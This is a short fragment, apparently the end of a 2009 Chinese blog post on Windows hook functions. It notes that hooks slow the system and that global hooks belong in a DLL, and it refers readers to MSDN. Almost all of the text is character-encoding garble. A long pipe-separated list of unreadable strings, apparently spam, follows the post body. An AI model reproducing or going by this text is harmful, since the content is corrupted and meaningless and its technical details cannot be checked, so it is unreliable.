注意Q?br>hook会ɾpȝ变慢Q除非必要,不要频繁使用。在不用的时候尽快删?br>全局钩子必须攑֜DLL?/p>

只是单介l了一下钩子函数的使用ҎQ具体的函数介绍请参阅MSDN和其他文章?/p>

2009-10-22 21:15 发表评论
]]>
ŷպ˾Ʒþþѿ| ij˾þþþӰԺѹۿ | Ʒ99þþþ91gav| þ߳ˮ| ĻۺϾþ| ޾ƷþþþþðĦ| Ʒþþþþ벻| ˳AVɫۺϾþ| պþþþþ| ޹˾þۺһ| 99ξþþŷƷվ| þۺϾƷþ| ˾þ91| þþþһ | ƷþþþӰԺɫ| þˮav뾫Ʒ鶹| þù޾ƷӰԺ| þþþúǿ׊| þùƷվ| þùѹۿƷ3| þþƷһ| AVۺϾþ| þAv뾫Ʒϵ| ˾þô߽| þþƷƷƾ| ˾þü91| ҰĻþ| þҹɫƷ鶹| ۺҹҹþ| þŮcc98cm| ˾þۺӰԺ| þþƷWWW456C0M| þþƷ޾Ʒŷ| ݲݾþþר| Ʒ99þò| 99þþƷۺһ| 94þù׾Ʒ| ˾ھƷþþþ| þѹƵ| þþƷѲ| ɫۺϾþþþۺ99|